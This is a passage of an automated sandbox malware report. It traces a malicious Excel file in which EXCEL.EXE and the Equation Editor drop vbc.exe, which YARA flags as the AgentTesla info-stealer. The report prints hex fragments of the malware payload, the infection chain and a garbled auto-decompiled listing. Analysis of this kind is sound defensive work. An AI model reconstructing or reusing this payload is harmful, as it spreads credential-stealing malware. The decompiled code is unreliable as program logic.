00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 19 00 00 70 80 04 00 00 04 2a 36 03 02 7b 62 00 00 0a 28 5e 00 00 0a 2a 8a 03 6f 03 00 00 0a 02 7b 61 00 00 0a 7b 63 00 00 0a 02 7b 62 00 00 0a 6f 5a 00 00 0a 28 5e 00 00 0a 2a 2e 73 6f 00 00 0a 80 70 00 00 0a 2a 1e 03 6f 71 00 00 0a 2a 56 02 7b 11 00 00 04 6f 64 00 00 0a 03 28 12 00 00 2b 16 fe 01 2a 4a 02 7b 12 00 00 04 6f 31 00 00 0a 03 6f 76 00 00 0a 2a 4a 03 02 7b 13 00 00 04 6f 71 00 00 0a 28 5e 00 00 0a 2a 2e 73 33 00 00 06 80 14 00 00 04 2a 2e 73 38 00 00 06 80 16 00 00 04 2a 0a 03 2a 1e 02 7b 1a 00 00 04 2a 22 02 03 7d 1a 00 00 04 2a 1e 02 7b 1b 00 00 04 2a 22 02 03 7d 1b 00 00 04 2a 56 02 28 07 00 00 0a 02 03 28 40 00 00 06 02 04
          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL:_hN @ T@KB H.textTg h `.rsrcBj@@.relocn@B0H`qpuabdcefghijklmnprqstuvwzyx0123456789ABCDEFGHIJKLMNQPRTSVUWXYZ6(o*B(o&*2(t*(&*2to*F~~(**(*(((((o*&o*(*(*.rp*6{b(^*o{a{c{boZ(^*.sop*oq*V{od(+*J{o1ov*J{oq(^*.s3*.s8**{*"}*{*"}*V((@
          Nov 20, 2020 19:32:05.534444094 CET3INData Raw: 28 42 00 00 06 2a 4a 03 6f 3f 00 00 06 02 7b f1 00 00 0a 28 5e 00 00 0a 2a 52 03 6f 41 00 00 06 02 7b f2 00 00 0a 6f 41 00 00 06 fe 01 2a 2e 73 f5 00 00 0a 80 f6 00 00 0a 2a 1e 03 6f 3f 00 00 06 2a 2a 03 28 22 00 00 2b 17 fe 02 2a 1e 03 6f f8 00
          Data Ascii: (B*Jo?{(^*RoA{oA*.s*o?**("+*o*.s*2o(*6{,(^*z|-(.o*6{/(^*s9%}:%};%}<%}=%}>*s@%}A%}B%}C
          Nov 20, 2020 19:32:05.534463882 CET4INData Raw: 00 00 04 2a 1e 02 7b ce 00 00 04 2a 22 02 03 7d ce 00 00 04 2a 1e 02 7b d3 00 00 04 2a 22 02 03 7d d3 00 00 04 2a 1e 02 7b d4 00 00 04 2a 22 02 03 7d d4 00 00 04 2a 1b 30 02 00 28 00 00 00 01 00 00 11 02 72 01 00 00 70 6f 04 00 00 0a 0a 06 2c 09
          Data Ascii: *{*"}*{*"}*{*"}*0(rpo,(,o**0M((s&s~(jos(,o*(A0
          Nov 20, 2020 19:32:05.534481049 CET5INData Raw: 1c 00 00 06 2a 1b 30 03 00 9c 00 00 00 0e 00 00 11 d0 03 00 00 1b 28 44 00 00 0a 28 29 00 00 0a 28 0a 00 00 2b 0a 73 2f 00 00 0a 0b 02 28 0c 00 00 2b 73 46 00 00 0a 0c 02 6f 2c 00 00 0a 6f 47 00 00 0a 0d 00 2b 32 09 6f 48 00 00 0a 13 04 11 04 74
          Data Ascii: *0(D()(+s/(+sFo,oG+2oHt(+,oI+oJoK-u,oQ(+,+*3?r0k(D()(+sFo,oG+
          Nov 20, 2020 19:32:05.534497023 CET7INData Raw: 00 1b 11 06 6f 54 00 00 0a 2b 64 02 7b 6c 00 00 0a 72 c3 00 00 70 1a 8d 01 00 00 01 25 16 02 7b 6d 00 00 0a 8c 2e 00 00 01 a2 25 17 02 7b 63 00 00 0a 06 7b 62 00 00 0a 6f 5a 00 00 0a a2 25 18 08 6f 55 00 00 0a 6f 03 00 00 0a a2 25 19 02 7b 6a 00
          Data Ascii: oT+d{lrp%{m.%{c{boZ%oUo%{j{boPoW(Ro_*06{od(r(+,{(r(tou*0js0}{od1s@(+(+,#
          Nov 20, 2020 19:32:05.534512997 CET8INData Raw: 06 a7 00 00 0a 73 a8 00 00 0a 25 80 a5 00 00 0a 28 19 00 00 2b 7e a9 00 00 0a 25 2d 17 26 7e a6 00 00 0a fe 06 aa 00 00 0a 73 ab 00 00 0a 25 80 a9 00 00 0a 28 1a 00 00 2b 7e ad 00 00 0a 25 2d 17 26 7e a6 00 00 0a fe 06 ae 00 00 0a 73 af 00 00 0a
          Data Ascii: s%(+~%-&~s%(+~%-&~s%(+~%-&~s%(+o8so}ss(+}o+fso}
          Nov 20, 2020 19:32:05.534529924 CET10INData Raw: 00 0a 6f e4 00 00 0a 6f e6 00 00 0a 26 11 04 17 58 13 04 11 04 09 6f e7 00 00 0a fe 04 2d ae 02 6f e8 00 00 0a 13 07 00 2b 6a 11 07 6f e9 00 00 0a 13 08 08 6f 8a 00 00 0a 13 09 03 13 0a 2b 3b 09 11 0a 6f e2 00 00 0a 6f e3 00 00 0a 13 0b 11 09 11
          Data Ascii: oo&Xo-o+joo+;oooo%-&~SoXo-o,ooK-,o*x0(D(s(+(+
          Nov 20, 2020 19:32:05.534547091 CET11INData Raw: 08 04 8c 03 00 00 1b fe 16 03 00 00 1b 6f 04 01 00 0a 2c 11 09 06 7b 07 01 00 0a 28 5e 00 00 0a 2c 03 07 2b 05 7e ca 00 00 0a 13 07 11 07 2a 00 00 13 30 05 00 28 00 00 00 20 00 00 11 02 6f 0a 01 00 0a 6f 0b 01 00 0a 6f 0c 01 00 0a 6f 0d 01 00 0a
          Data Ascii: o,{(^,+~*0( oooooo*0'!o(ooso*0R"ooorpooWooorypotoW(
          Nov 20, 2020 19:32:05.534564018 CET13INData Raw: 7d 4e 01 00 0a 00 2b 2e 02 02 7b 4e 01 00 0a 6f 48 00 00 0a 7d 4f 01 00 0a 02 7b 4d 01 00 0a 02 7b 4f 01 00 0a 6f 57 00 00 0a 6f 5f 00 00 0a 02 14 7d 4f 01 00 0a 02 7b 4e 01 00 0a 6f 4b 00 00 0a 2d c5 de 16 02 7b 4e 01 00 0a 75 0a 00 00 01 0d 09
          Data Ascii: }N+.{NoH}O{M{OoWo_}O{NoK-{Nu,o}N{P,=sQ%r3poR%rpoS%oT}U}FM}F{VoW}X}F+}F|Z{XoK-(J}X
          Nov 20, 2020 19:32:05.534579992 CET14INData Raw: 02 16 7d 6c 01 00 0a 02 0a 2b 07 16 73 85 01 00 0a 0a 06 02 7b 86 01 00 0a 7d 87 01 00 0a 06 02 7b 88 01 00 0a 7d 71 01 00 0a 06 02 7b 89 01 00 0a 7d 77 01 00 0a 06 02 7b 8a 01 00 0a 7d 73 01 00 0a 06 2a 00 13 30 03 00 2b 00 00 00 2d 00 00 11 28
          Data Ascii: }l+s{}{}q{}w{}s*0+-(soooo&*0.rp(#o orp(# ~oo~o~o~o
          Nov 20, 2020 19:32:05.661571026 CET16INData Raw: 00 0a 38 86 00 00 00 02 02 7b d1 01 00 0a 02 7b d2 01 00 0a 9a 7d d3 01 00 0a 02 02 7b d3 01 00 0a 6f 03 00 00 0a 7d d4 01 00 0a 02 02 7b d3 01 00 0a 02 7b cd 01 00 0a 14 6f d5 01 00 0a 7d d6 01 00 0a 02 7b a7 01 00 0a 02 7b d4 01 00 0a 6f d7 01
          Data Ascii: 8{{}{o}{{o}{{o{{oT}}}{X}{{i?g}{}}(*A|cY<C


          Code Manipulations

          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          Analysis Process: EXCEL.EXE PID: 2300 Parent PID: 584

          General

          Start time:19:31:42
          Start date:20/11/2020
          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          Wow64 process (32bit):false
          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Imagebase:0x13f3f0000
          File size:27641504 bytes
          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Chronological Activities

          Analysis Process: EQNEDT32.EXE PID: 2480 Parent PID: 584

          General

          Start time:19:32:02
          Start date:20/11/2020
          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          Wow64 process (32bit):true
          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Imagebase:0x400000
          File size:543304 bytes
          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Chronological Activities

          Analysis Process: vbc.exe PID: 2824 Parent PID: 2480

          General

          Start time:19:32:04
          Start date:20/11/2020
          Path:C:\Users\Public\vbc.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\Public\vbc.exe'
          Imagebase:0x1340000
          File size:618496 bytes
          MD5 hash:020BC13012CE4DB6E204CB1ED174851E
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmp, Author: Joe Security
          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2362460442.0000000004454000.00000004.00000001.sdmp, Author: Joe Security
          Antivirus matches:
          • Detection: 100%, Joe Sandbox ML
          Reputation:low

          Chronological Activities

          Disassembly

          Code Analysis

          Reset < >

            Analysis Process: vbc.exe PID: 2824 Parent PID: 2480 vbc.exeCOMMON

            Executed Functions

            Function 001BD0EC, Relevance: .1, Instructions: 72COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000004.00000002.2355657537.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f57826ed1659b09a0ac8cdeecdac10ced51794ecc0c82bc515a5650a31b7d50e
            • Instruction ID: ff77ecc9543711b0662182c3ce0b6024ee63c4ddeea2ed0755c081c99298ac9a
            • Opcode Fuzzy Hash: f57826ed1659b09a0ac8cdeecdac10ced51794ecc0c82bc515a5650a31b7d50e
            • Instruction Fuzzy Hash: E921D4B5604344EFDB08DF58E8C4B56BBA5FB84314F24C9ADE8094B346D33AD846CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 001BD0E7, Relevance: .1, Instructions: 53COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000004.00000002.2355657537.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 13f25f2b4513098e7777517fd4da77a92fef37a780737990c108bf61b3c62d7b
            • Instruction ID: 2947940f891ed1a50cfc3f0b22066dcbe37e26b4aed2800ae919ea9dc02819d2
            • Opcode Fuzzy Hash: 13f25f2b4513098e7777517fd4da77a92fef37a780737990c108bf61b3c62d7b
            • Instruction Fuzzy Hash: 2C119D75504280DFDB05CF14E9C4B55BFA1FB84314F28C6A9D8094B656C33AD84ACBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 001AD041, Relevance: .0, Instructions: 45COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000004.00000002.2355648724.00000000001AD000.00000040.00000001.sdmp, Offset: 001AD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4728f021273d187f866b969bc7898ceac408de140774b3be38a351c4a09e91f4
            • Instruction ID: cd405b6644a4e0b2db1130637e6e08f5d5115ee90a0b96d1babd4d73f28a1325
            • Opcode Fuzzy Hash: 4728f021273d187f866b969bc7898ceac408de140774b3be38a351c4a09e91f4
            • Instruction Fuzzy Hash: A001F775004B449BD7208A25D984B6BBFD8EF52324F28C516FD464B682C3789C41CBB2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 001AD040, Relevance: .0, Instructions: 36COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000004.00000002.2355648724.00000000001AD000.00000040.00000001.sdmp, Offset: 001AD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3fd09feadd67f65caefbf33a4111d99aef984a17ea82b9d2097d1b59fca2ed8b
            • Instruction ID: b1ffdf9605c5bbb72af412c1d4f969fef8af7289a570b3763a0078b5c5ab52f4
            • Opcode Fuzzy Hash: 3fd09feadd67f65caefbf33a4111d99aef984a17ea82b9d2097d1b59fca2ed8b
            • Instruction Fuzzy Hash: 5FF0C2314047849BE7108A15DD88B66FFD8EB92334F28C45AFD495F282C3799C40CBB1
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 013CF3A9, Relevance: .6, Instructions: 623COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 79%
            			E013CF3A9(signed int __eax, void* __ebx, signed int __ecx, intOrPtr* __edx, signed int __edi, signed int __esi) {
				signed char _t318;
				void* _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t325;
				signed int _t331;
				signed int _t334;
				intOrPtr* _t335;
				signed int _t338;
				signed int _t340;
				signed int _t345;
				signed int _t347;
				intOrPtr* _t348;
				signed int _t350;
				intOrPtr* _t352;
				signed int _t353;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				intOrPtr* _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed char _t374;
				signed char _t375;
				signed char _t378;
				signed char _t379;
				signed char _t380;
				signed char _t381;
				signed char _t382;
				signed char _t383;
				signed char _t384;
				signed char _t385;
				signed int _t386;
				signed int* _t389;
				signed int _t390;
				signed int* _t391;
				intOrPtr* _t394;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t398;
				signed int* _t399;
				signed int _t401;
				signed int* _t402;
				signed int _t403;
				signed int _t404;
				signed int* _t406;
				signed char _t410;
				intOrPtr* _t411;
				signed int _t412;
				char* _t413;
				signed char _t414;
				void* _t417;
				signed int _t419;
				signed int _t420;
				signed char _t422;
				intOrPtr* _t423;
				void* _t424;
				signed int _t425;
				signed int _t431;
				intOrPtr _t432;
				intOrPtr* _t433;
				void* _t435;
				signed int* _t436;
				signed int* _t437;
				signed int* _t438;
				intOrPtr* _t440;
				signed int* _t442;
				signed int _t444;
				intOrPtr* _t445;
				signed int _t446;
				signed int _t449;
				signed int _t451;
				signed int* _t453;
				signed int* _t459;
				signed int* _t463;
				signed int* _t465;
				signed int* _t466;
				signed int _t468;
				signed int _t469;

				_t318 = __eax | 0xffffffff9fe00603;
				asm("sbb ecx, [0xb8000102]");
				_pop(ds);
				asm("in al, dx");
				asm("adc eax, [esi]");
				 *((intOrPtr*)(__esi + 0x113ec1b)) =  *((intOrPtr*)(__esi + 0x113ec1b)) + __ecx;
				 *__edx =  *__edx + _t318;
				asm("adc eax, [esi]");
				_t320 = (_t318 & __ecx) + (_t318 & __ecx);
				asm("sbb ebp, esp");
				asm("adc eax, [ecx]");
				_t466[0x43aac7] = _t466[0x43aac7] + _t320;
				_t466[0x407647] = _t466[0x407647] + __ecx;
				_t419 = __ecx + __ecx;
				_pop(ds);
				asm("scasd");
				 *_t419 =  *_t419 + _t320;
				_t321 = _t320 + _t419;
				_pop(ds);
				asm("scasd");
				 *_t419 =  *_t419 + _t321;
				_t410 = __ebx + __edx;
				_pop(ds);
				asm("scasd");
				 *_t419 =  *_t419 + _t321;
				 *((intOrPtr*)(__esi + 0x16)) =  *((intOrPtr*)(__esi + 0x16)) + _t321;
				_t322 = _t321 | 0x17000102;
				_pop(ss);
				asm("scasd");
				 *_t419 =  *_t419 + _t322;
				 *((intOrPtr*)(__esi + __edx + 0x1020d)) =  *((intOrPtr*)(__esi + __edx + 0x1020d)) + _t419;
				asm("popfd");
				_t323 = _t322 - 0xaf;
				 *__esi =  *__esi + _t323;
				 *_t323 =  *_t323 + _t323;
				asm("das");
				asm("scasd");
				 *_t419 =  *_t419 + _t323;
				 *((intOrPtr*)(_t419 + 0x6020d2c)) =  *((intOrPtr*)(_t419 + 0x6020d2c)) + _t323;
				 *_t419 =  *_t419 + _t419;
				asm("das");
				_pop(ds);
				_t325 = _t323 | 0xfffffffffb000702;
				asm("das");
				_push(_t325);
				asm("sbb dh, [esi]");
				 *((intOrPtr*)(_t325 + 0xf)) =  *((intOrPtr*)(_t325 + 0xf)) + _t325;
				asm("pushad");
				asm("sbb dl, [esi]");
				 *__edx =  *__edx + _t410;
				_t466[6] = _t466[6] ^ _t325;
				_push(ss);
				 *((intOrPtr*)(_t325 + __esi)) =  *((intOrPtr*)(_t325 + __esi)) + _t325;
				asm("outsb");
				asm("sbb al, [esi]");
				 *_t419 =  *_t419 + _t410;
				asm("sbb al, 0x1f");
				_push(ss);
				_push(es);
				 *((intOrPtr*)(_t325 + 0x1c)) =  *((intOrPtr*)(_t325 + 0x1c)) + __edx;
				_t466[6] = _t466[6] & _t410;
				 *[ss:eax+0xf] =  *[ss:eax+0xf] + (_t325 | 0x3c000602);
				_push(ss);
				 *__edi =  *__edi + __edx;
				 *0x66000134 =  *0x66000134 & 0x0000001a;
				ss = ss;
				asm("scasd");
				 *_t419 =  *_t419 + 0x1a;
				 *((intOrPtr*)(__esi + __edx + 0x1020d)) =  *((intOrPtr*)(__esi + __edx + 0x1020d)) + _t419;
				_push(es);
				 *((intOrPtr*)(__edi + 0x1020d30)) =  *((intOrPtr*)(__edi + 0x1020d30)) + _t419;
				 *0x16FFFF3A =  *((intOrPtr*)(0x16ffff3a)) + __edx;
				 *0xc9000102 =  *0xc9000102 ^ _t419;
				 *(__edi - 0x23ffff00) =  *(__edi - 0x23ffff00) ^ _t419;
				_t331 = 0xffffffffbeffff0f ^ _t410;
				asm("sbb al, [ecx]");
				 *_t419 =  *_t419 ^ 0x0000001a;
				asm("sbb eax, [ecx]");
				 *0x2000102 =  *0x2000102 ^ _t419;
				 *0x66000102 =  *0x66000102 ^ _t419;
				ss = ss;
				_push(ss);
				_t431 = __edx + _t331 + __edx + _t331 &  *(__edi + 0x1800060d);
				 *(__edi + 0x2100010d) =  *(__edi + 0x2100010d) ^ _t431;
				 *(__edi + 0x2c000109) =  *(__edi + 0x2c000109) ^ __esi;
				_t334 = (_t331 | 0x37000102) ^ __edi;
				 *_t419 =  *_t419 + _t334;
				_t335 = _t334 + _t410;
				asm("clc");
				 *_t419 =  *_t419 + _t335;
				 *0x1020d31 =  *0x1020d31 + _t410;
				 *((intOrPtr*)(_t419 + __esi - 5)) =  *((intOrPtr*)(_t419 + __esi - 5)) + 0x1a;
				asm("adc [ecx], al");
				 *((intOrPtr*)(_t410 + 0x31)) =  *((intOrPtr*)(_t410 + 0x31)) + _t431;
				asm("scasd");
				 *_t419 =  *_t419 + 0x1a;
				_t466[0xc] = _t466[0xc] + _t410;
				_t440 = _t335;
				asm("scasd");
				 *__esi =  *__esi + _t431;
				_t338 = (__edi | 0x33780006) + _t419;
				ss = ss;
				asm("sgdt [es:eax]");
				 *_t419 =  *_t419 + 0x1a;
				 *((intOrPtr*)(_t338 + 0x34)) =  *((intOrPtr*)(_t338 + 0x34)) + _t431;
				_t340 = (_t338 | 0x6b000102) ^ 0x000000af;
				 *_t419 =  *_t419 + 0x1a;
				 *((intOrPtr*)(__esi + 0x10d9734)) =  *((intOrPtr*)(__esi + 0x10d9734)) + 0x1a;
				 *((intOrPtr*)(__esi + 0x10db0)) =  *((intOrPtr*)(__esi + 0x10db0)) + _t340;
				_t59 = _t440 + _t431 * 4;
				_t432 =  *_t59;
				 *_t59 = _t431;
				asm("scasd");
				 *__esi =  *__esi + 0x1a;
				_push(es);
				asm("invalid");
				_t469 = _t340 | 0x353a0001;
				asm("pushfd");
				asm("movsb");
				_t345 = _t468 ^ 0x11c9f;
				 *_t419 =  *_t419 + 0x1a;
				 *((intOrPtr*)(_t440 + 0x3300af35)) =  *((intOrPtr*)(_t440 + 0x3300af35)) + _t432;
				 *((intOrPtr*)(_t419 + 0x36)) =  *((intOrPtr*)(_t419 + 0x36)) + __esi;
				asm("out 0x1c, eax");
				asm("enter 0x20, 0x0");
				 *_t345 =  *_t345 + 0x1a;
				_t444 = _t345;
				 *((intOrPtr*)(_t432 + 0x21)) =  *((intOrPtr*)(_t432 + 0x21)) + _t410;
				_push(_t419);
				 *_t419 =  *_t419 + 0x1a;
				_t433 = _t432 + _t432;
				 *__esi =  *__esi & 0x0000001a;
				 *__esi =  *__esi + 0x1a;
				 *((intOrPtr*)(_t444 + 0x60219a00)) =  *((intOrPtr*)(_t444 + 0x60219a00)) + _t433;
				 *_t410 =  *_t410 + 0x1a;
				_t411 = _t410 + __esi;
				 *__esi =  *__esi & 0x0000001a;
				 *__esi =  *__esi + 0x1a;
				 *((intOrPtr*)(_t444 + 0x6821ae00)) =  *((intOrPtr*)(_t444 + 0x6821ae00)) + _t433;
				 *0x20f400 =  *0x20f400 + 0x1a;
				 *__esi =  *__esi + 0x1a;
				 *((intOrPtr*)(_t444 + 0x6e21c300)) =  *((intOrPtr*)(_t444 + 0x6e21c300)) + _t433;
				 *_t444 =  *_t444 + 0x1a;
				_t347 = __esi + _t411;
				 *_t347 =  *_t347 & 0x0000001a;
				 *_t347 =  *_t347 + 0x1a;
				 *((intOrPtr*)(_t411 + 0x7621ca00)) =  *((intOrPtr*)(_t411 + 0x7621ca00)) + _t433;
				 *_t444 =  *_t444 + 0x1a;
				 *_t419 =  *_t419 + _t419;
				 *_t347 =  *_t347 & _t347;
				 *_t347 =  *_t347 + 0x1a;
				 *((intOrPtr*)(_t411 + 0x7b21e000)) =  *((intOrPtr*)(_t411 + 0x7b21e000)) + _t433;
				 *_t440 =  *_t440 + 0x1a;
				 *_t411 =  *_t411 + _t411;
				 *_t347 =  *_t347 & _t347;
				 *_t347 =  *_t347 + 0x1a;
				 *((intOrPtr*)(_t411 + 0x7b21f000)) =  *((intOrPtr*)(_t411 + 0x7b21f000)) + _t433;
				 *_t440 =  *_t440 + 0x1a;
				 *((intOrPtr*)(_t347 + 0x27)) =  *((intOrPtr*)(_t347 + 0x27)) + _t411;
				 *((intOrPtr*)(_t444 - 0x68ddf800)) =  *((intOrPtr*)(_t444 - 0x68ddf800)) + _t433;
				 *_t440 =  *_t440 + 0x1a;
				 *_t444 =  *_t444 + _t411;
				 *_t347 =  *_t347 & _t347;
				 *_t347 =  *_t347 + 0x1a;
				 *((intOrPtr*)(_t444 - 0x6cf1dae8)) =  *((intOrPtr*)(_t444 - 0x6cf1dae8)) + 0x1a;
				 *_t347 =  *_t347 + _t419;
				 *_t444 =  *_t444 + _t347;
				 *_t347 =  *_t347 & _t347;
				 *_t347 =  *_t347 + 0x1a;
				 *((intOrPtr*)(_t419 + 0x6e221718)) =  *((intOrPtr*)(_t419 + 0x6e221718)) + _t433;
				 *_t347 =  *_t347 + _t419;
				_t466[8] = _t466[8] + _t433;
				 *_t347 =  *_t347 + 0x1a;
				 *_t347 =  *_t347 + 0x1a;
				_t348 = _t411;
				_t412 = _t347;
				 *_t433 =  *_t433 + _t419;
				asm("daa");
				 *_t348 =  *_t348 + 0x1a;
				 *_t348 =  *_t348 + 0x1a;
				_t445 = _t348;
				 *0xFFFFFFFFFC000822 =  *((intOrPtr*)(0xfffffffffc000822)) + 0x1a;
				asm("in al, 0x0");
				_t350 = _t444 |  *_t444;
				 *((intOrPtr*)(_t445 - 0xaddb300)) =  *((intOrPtr*)(_t445 - 0xaddb300)) + 0xfc000800;
				 *((intOrPtr*)(_t350 + _t350)) =  *((intOrPtr*)(_t350 + _t350)) + _t419;
				 *_t350 =  *_t350 & _t350;
				 *_t350 =  *_t350 + 0x1a;
				 *((intOrPtr*)(_t419 + 0x6e225b00)) =  *((intOrPtr*)(_t419 + 0x6e225b00)) + 0xfc000800;
				 *((intOrPtr*)(_t350 + _t350)) =  *((intOrPtr*)(_t350 + _t350)) + _t419;
				 *_t350 =  *_t350 & _t350;
				 *_t350 =  *_t350 + 0x1a;
				 *((intOrPtr*)(_t445 + 0x6e226a00)) =  *((intOrPtr*)(_t445 + 0x6e226a00)) + 0xfc000800;
				 *((intOrPtr*)(_t350 + _t350)) =  *((intOrPtr*)(_t350 + _t350)) + _t419;
				_t442 = 0x28;
				 *_t350 =  *_t350 & _t350;
				 *_t350 =  *_t350 + 0x1a;
				 *((intOrPtr*)(_t419 + 0x6e229f00)) =  *((intOrPtr*)(_t419 + 0x6e229f00)) + 0xfc000800;
				 *((intOrPtr*)(_t350 + _t350)) =  *((intOrPtr*)(_t350 + _t350)) + _t419;
				_push(ds);
				 *_t350 =  *_t350 & _t350;
				 *_t350 =  *_t350 + 0x1a;
				 *((intOrPtr*)(_t445 - 0x6cf1dae8)) =  *((intOrPtr*)(_t445 - 0x6cf1dae8)) + 0x1a;
				 *((intOrPtr*)(_t350 + _t350)) =  *((intOrPtr*)(_t350 + _t350)) + _t419;
				asm("insd");
				 *_t350 =  *_t350 & _t350;
				 *_t350 =  *_t350 + 0x1a;
				 *((intOrPtr*)(_t419 + 0x6e221718)) =  *((intOrPtr*)(_t419 + 0x6e221718)) + 0xfc000800;
				 *((intOrPtr*)(_t350 + _t350)) =  *((intOrPtr*)(_t350 + _t350)) + _t419;
				 *_t350 = gs;
				 *_t350 =  *_t350 + 0x1a;
				 *_t350 =  *_t350 + 0x1a;
				_t446 = _t350;
				_t442[0x30041c8] = _t442[0x30041c8] + _t419;
				_t352 = _t445 + 0x1a;
				 *_t352 =  *_t352 - 0x1a;
				 *_t352 =  *_t352 + 0x1a;
				 *((intOrPtr*)(_t446 + 0x2922c600)) =  *((intOrPtr*)(_t446 + 0x2922c600)) + 0xfc000800;
				 *0x294c00 =  *0x294c00 + _t419;
				 *_t352 =  *_t352 + 0x1a;
				 *((intOrPtr*)(_t446 + 0x6722ff00)) =  *((intOrPtr*)(_t446 + 0x6722ff00)) + 0xfc000800;
				 *_t446 =  *_t446 + _t419;
				 *((intOrPtr*)(_t352 + 0x29)) =  *((intOrPtr*)(_t352 + 0x29)) + _t352;
				 *((intOrPtr*)(_t446 - 0x6adcb400)) =  *((intOrPtr*)(_t446 - 0x6adcb400)) + 0xfc000800;
				 *_t419 =  *_t419 + 0xfc000800;
				 *_t352 =  *_t352 + _t352;
				_t353 = _t352 -  *_t352;
				 *_t353 =  *_t353 + 0x1a;
				 *((intOrPtr*)(_t446 + 0x29236f00)) =  *((intOrPtr*)(_t446 + 0x29236f00)) + 0xfc000800;
				 *0xfc000800 =  *0xfc000800 + 0xfc000800;
				 *((intOrPtr*)(0xfc000800 + _t466)) =  *((intOrPtr*)(0xfc000800 + _t466)) + _t419;
				 *_t353 =  *_t353 + 0x1a;
				 *((intOrPtr*)(_t419 - 0x48dc6400)) =  *((intOrPtr*)(_t419 - 0x48dc6400)) + 0xfc000800;
				 *_t412 =  *_t412 + 0xfc000800;
				 *_t446 =  *_t446 + _t412;
				 *_t353 =  *_t353 & _t353;
				 *_t353 =  *_t353 + 0x1a;
				 *((intOrPtr*)(_t446 - 0x6cf1dae8)) =  *((intOrPtr*)(_t446 - 0x6cf1dae8)) + _t353;
				 *_t446 =  *_t446 + 0xfc000800;
				 *((intOrPtr*)(0xfc000800 + _t466)) =  *((intOrPtr*)(0xfc000800 + _t466)) + _t353;
				 *((intOrPtr*)(_t446 + 0x24)) =  *((intOrPtr*)(_t446 + 0x24)) + _t419;
				_push(ss);
				 *0x0000002D =  *((intOrPtr*)(0x2d)) + _t412;
				 *2 =  *2 + 2;
				 *2 =  *2 + 2;
				 *((intOrPtr*)(_t412 + 0x10)) =  *((intOrPtr*)(_t412 + 0x10)) + _t419;
				 *0xfc000800 =  *0xfc000800 + 1;
				asm("sbb [eax], al");
				L1();
				 *0x52106B02 =  *((intOrPtr*)(0x52106b02)) + 0xfc000800;
				_t413 = _t412 +  *0xfc000800;
				 *((intOrPtr*)(_t466 + _t469)) =  *((intOrPtr*)(_t466 + _t469)) + _t419;
				_t449 = _t353;
				 *((intOrPtr*)(_t413 + 0x10)) =  *((intOrPtr*)(_t413 + 0x10)) + _t419;
				 *_t413 =  *_t413 + 0x1c;
				 *0x00000004 =  *0x00000004 + 2;
				 *((intOrPtr*)(_t449 - 0x35db8000)) =  *((intOrPtr*)(_t449 - 0x35db8000)) + 0xfc000800;
				_t414 = _t413 +  *0x2d7800;
				 *0x00000004 =  *0x00000004 + 2;
				 *((intOrPtr*)(_t449 + 0x40f8300)) =  *((intOrPtr*)(_t449 + 0x40f8300)) + 0xfc000800;
				_t360 = _t449;
				 *((intOrPtr*)(_t414 + 0x1f04040f)) =  *((intOrPtr*)(_t414 + 0x1f04040f)) + 2;
				 *_t360 =  *_t360 + 2;
				 *[cs:eax] =  *[cs:eax] + 2;
				 *_t360 =  *_t360 + 2;
				_t361 = _t419;
				_t420 = _t360;
				 *((intOrPtr*)(_t420 + 0x20044924)) =  *((intOrPtr*)(_t420 + 0x20044924)) + 0xfc000800;
				 *((intOrPtr*)(_t361 + 0x2e)) =  *((intOrPtr*)(_t361 + 0x2e)) + _t420;
				 *((intOrPtr*)(_t420 - 0x37db5800)) =  *((intOrPtr*)(_t420 - 0x37db5800)) + 0xfc000800;
				_t362 = _t361 + 0x22;
